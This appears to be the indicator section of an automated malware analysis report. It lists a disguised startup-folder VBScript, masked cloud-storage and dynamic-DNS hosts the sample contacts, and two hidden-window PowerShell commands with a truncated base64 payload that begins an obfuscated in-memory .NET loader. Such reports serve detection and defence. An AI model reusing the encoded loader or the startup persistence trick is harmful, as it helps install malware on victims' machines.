Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\netframwork4.2.vbs
- 'on####ve.live.com':443
- 'k7####.#n.files.1drv.com':443
- 'ia#####3.us.archive.org':443
- 'up####.myiphost.com':1919
- 'microsoft.com':80
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- 'on####ve.live.com':443
- 'k7####.#n.files.1drv.com':443
- 'ia#####3.us.archive.org':443
- DNS ASK on####ve.live.com
- DNS ASK k7####.#n.files.1drv.com
- DNS ASK ia#####3.us.archive.org
- DNS ASK up####.myiphost.com
- DNS ASK microsoft.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhA...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhA...